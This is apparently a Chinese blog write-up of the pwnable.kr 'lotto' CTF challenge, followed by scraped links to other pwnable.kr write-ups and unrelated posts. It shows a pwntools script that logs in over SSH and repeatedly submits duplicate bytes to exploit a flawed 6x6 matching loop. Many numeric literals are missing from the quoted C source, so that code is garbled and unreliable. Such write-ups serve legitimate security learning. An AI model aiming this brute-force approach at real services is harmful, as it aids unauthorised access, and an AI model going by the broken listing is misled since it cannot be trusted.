pwnable。好像最近的几道题都不需要看汇编。

ssh lotto@pwnable.kr -p2222 (pw:guest)

直接down下来源码

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <fcntl.h>

unsigned char submit[];

void play(){

    int i;

    printf("Submit your 6 lotto bytes : ");

    fflush(stdout);

    int r;

    r = read(, submit, );

    printf("Lotto Start!\n");

    //sleep(1);

    // generate lotto numbers

    int fd = open("/dev/urandom", O_RDONLY);

    if(fd==-){

        printf("error. tell admin\n");

        exit(-);

    }

    unsigned char lotto[];

    if(read(fd, lotto, ) != ){

        printf("error2. tell admin\n");

        exit(-);

    }

    for(i=; i<; i++){

        lotto[i] = (lotto[i] % ) + ;        // 1 ~ 45

    }

    close(fd);

    // calculate lotto score

    int match = , j = ;

    for(i=; i<; i++){

        for(j=; j<; j++){

            if(lotto[i] == submit[j]){

                match++;

            }

        }

    }

    // win!

    if(match == ){

        system("/bin/cat flag");

    }

    else{

        printf("bad luck...\n");

    }

}

void help(){

    printf("- nLotto Rule -\n");

    printf("nlotto is consisted with 6 random natural numbers less than 46\n");

    printf("your goal is to match lotto numbers as many as you can\n");

    printf("if you win lottery for *1st place*, you will get reward\n");

    printf("for more details, follow the link below\n");

    printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n");

    printf("mathematical chance to win this game is known to be 1/8145060.\n");

}

int main(int argc, char* argv[]){

    // menu

    unsigned int menu;

    while(){

        printf("- Select Menu -\n");

        printf("1. Play Lotto\n");

        printf("2. Help\n");

        printf("3. Exit\n");

        scanf("%d", &menu);

        switch(menu){

            case :

                play();

                break;

            case :

                help();

                break;

            case :

                printf("bye\n");

                return ;

            default:

                printf("invalid menu\n");

                break;

        }

    }

    return ;

}

看到随机数是从 /dev/urandom中取出的,搜了一下,发现这个是伪随机。

最开始的想法是直接找到第一个爆破一下,发现爆破难度还是挺大的,因为每次运行都是不一样的,这个是系统自行维护的。

找一下源代码吧。

    for(i=0; i<6; i++){

        for(j=0; j<6; j++){

            if(lotto[i] == submit[j]){

                match++;

            }

        }

这部分乍一看好像没问题,循环6*6次,找到6次一样的就够了。

大致想想好像没啥问题,但是总觉得不对,如果这样输入6个1,当产生的lotto[6]中有一个是1就bypass了。

上脚本验证一下:

from pwn import *

s= ssh(host='pwnable.kr',user='lotto',password='guest',port=2222)

pro = s.process('/home/lotto/lotto')

print pro.recv()

pro.sendline('')

print pro.recv()

str1 = ""

str1 += chr(1)+chr(1)+chr(1)+chr(1)+chr(1)+chr(6)

pro.sendline(str1)

revcstr =  pro.recv()

print len(revcstr),revcstr

#exit()

while 1:

    pro.sendline('')

    print pro.recv()

    pro.sendline(str1)

    a =  pro.recv()

    if len(a)>71: #71是先验知识,指输入错误返回字符串的长度,就是下面字符串的长度

        print a

        break

    #pass
'''

Lotto Start!
bad luck...
- Select Menu -
1. Play Lotto
2. Help
3. Exit

'''

运行一下:

【pwnable.kr】lotto的更多相关文章

  1. 【pwnable.kr】 asm

    一道写shellcode的题目, #include <stdio.h> #include <string.h> #include <stdlib.h> #inclu ...

  2. 【pwnable.kr】 [simple login]

    Download : http://pwnable.kr/bin/login Running at : nc pwnable.kr 9003 先看看ida里面的逻辑. 比较重要的信息时input变量再 ...

  3. 【pwnable.kr】 brainfuck

    pwnable.kr第二关第一题: ========================================= Download : http://pwnable.kr/bin/bfDownl ...

  4. 【pwnable.kr】 unlink

    pwnable.kr 第一阶段的最后一题! 这道题目就是堆溢出的经典利用题目,不过是把堆块的分配与释放操作用C++重新写了一遍,可参考<C和C++安全编码一书>//不是广告 #includ ...

  5. 【pwnable.kr】 memcpy

    pwnable的新一题,和堆分配相关. http://pwnable.kr/bin/memcpy.c ssh memcpy@pwnable.kr -p2222 (pw:guest) 我觉得主要考察的是 ...

  6. 【pwnable.kr】 codemap

    pwnable新的一题. download: http://pwnable.kr/bin/codemap.exe ssh codemap@pwnable.kr -p2222 (pw:guest) 这道 ...

  7. 【pwnable.kr】 uaf

    目测是比较接近pwnable的一道题.考察了uaf(use after free的内容),我觉得说白了就是指针没有初始化的问题. ssh uaf@pwnable.kr -p2222 (pw:guest ...

  8. 【pwnable.kr】input

    这道题是一道一遍一遍满足程序需求的题. 网上其他的题解都是用了C语言或者python语言的本地调用,我想联系一下pwntools的远程调用就写了下面的脚本, 执行效果可以通过1~4的检测,到最后soc ...

  9. 【pwnable.kr】cmd2

    这道题是上一个cmd1的升级版 ssh cmd2@pwnable.kr -p2222 (pw:mommy now I get what PATH environmentis for :)) 登录之后, ...

随机推荐

  1. CSP2019 Emiya 家今天的饭

    Description: 有 \(n\) 中烹饪方法和 \(m\) 种食材,要求: 至少做一种菜 所有菜的烹饪方法各不相同 同种食材的菜的数量不能超过总菜数的一半 求做菜的方案数. Solution1 ...

  2. 「NOI2005」维护数列

    「NOI2005」维护数列 传送门 维护过程有点像线段树. 但我们知道线段树的节点并不是实际节点,而平衡树的节点是实际节点. 所以在向上合并信息时要加入根节点信息. 然后节点再删除后编号要回退(栈), ...

  3. Python 基础之循环结构for及break pass continue

    一.for 循环 #循环 变量 迭代 都是一个意思#把列表里面的元素意义的拿出来就是遍历listvar = ["one","two","three&q ...

  4. 1 网页及浏览器内核&Web标准

    网页的组成: 主要由文字.图像和超链接等元素构成,还可以包含音频.视频以及flash. 浏览器内核: 浏览器内核分为两部分: 1 渲染引擎(layout engineer) 渲染引擎负责取得网页的内容 ...

  5. CF1209C Paint the Digits

    CF1209C Paint the Digits 题意:给定T组数据,每组数据第一行输入数字串长度,第二行输入数字串,用数字1和2对数字串进行涂色,被1涂色的数字子串和被2涂色的数字子串拼接成新的数字 ...

  6. 线程context

    线程切换的时候,要保存当前运行状态,以便后续切换回来 CONTEXT结构体保存的是一堆寄存器 两个函数 //You cannot get a valid context for a running t ...

  7. 图解jvm--(一)jvm内存结构

    jvm内存结构 1.程序计数器 1.1 定义 Program Counter Register 程序计数器(寄存器) 作用,记住下一条jvm指令的执行地址 特点 是线程私有的 (唯一)不会存在内存溢出 ...

  8. redis、mongodb、memcache安装好后设置开机自启动

    vim /etc/rc.d/rc.local /usr/local/mongodb/bin/mongod --smallfiles /usr/local/bin/redis-server/usr/lo ...

  9. 070、Java面向对象之深入贯彻对象引用传递

    01.代码如下: package TIANPAN; class Book { // 定义一个新的类 String title; // 书的名字 double price; // 书的价格 public ...

  10. 前端学习笔记系列一:13new Date()的参数

    前两天发现手机页面的倒计时在Android上正常显示,在iPhone却不能显示. 后来又发现在ff和ie里也不显示.(以前只在chrome里看过,显示正常). 后来同事改了new Date()里字符串 ...